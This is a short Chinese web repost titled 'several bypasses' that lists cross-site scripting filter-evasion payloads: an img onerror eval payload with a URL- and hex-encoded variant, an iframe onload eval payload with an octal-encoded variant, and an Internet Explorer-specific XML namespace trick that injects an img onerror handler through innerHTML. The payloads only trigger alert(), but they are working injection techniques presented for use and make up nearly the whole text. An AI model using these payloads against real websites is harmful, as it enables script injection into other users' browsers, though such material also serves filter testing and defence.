鸿 网 互 联 www.68idc.cn

当前位置 : 服务器租用 > 网站安全 > 安全设置 > >

几个bypass

来源:互联网 作者:佚名 时间:2015-10-19 08:41
几个bypass如下: img src=5 onerror=eval(alert(lalala~))/img变形如: %3Cimg%20src=%225%22%20onerror=eval%28%22\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29%22%29%3E%3C/img%3E利用Hex 编码,加上img 的错误事件 用eval 函数 操控()内的代码 ifra

几个bypass如下:

<img src="5" onerror=eval("alert('lalala~')")></img>变形如:

%3Cimg%20src=%225%22%20onerror=eval%28%22\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29%22%29%3E%3C/img%3E利用Hex 编码,加上img 的错误事件 用eval 函数 操控()内的代码

<iframe onload=eval("alert('1')")></iframe>变形如:

<iframe onload=eval("\141\154\145\162\164\50\47\61\47\51")></iframe>通过iframe,转换为16进制或8进制都可行

接下来这个是针对IE的:

<div id=x>x</div>
<xml:namespace prefix=t>
<import namespace=t implementation=%23default%23time2>
<t:set/attributename=innerHTML targetElement=x to=%26lt;img%26%2311;src=x:x%26%2311;onerror%26%2311;=alert%26%23x28;1%26%23x29;%26gt;>

网友评论
<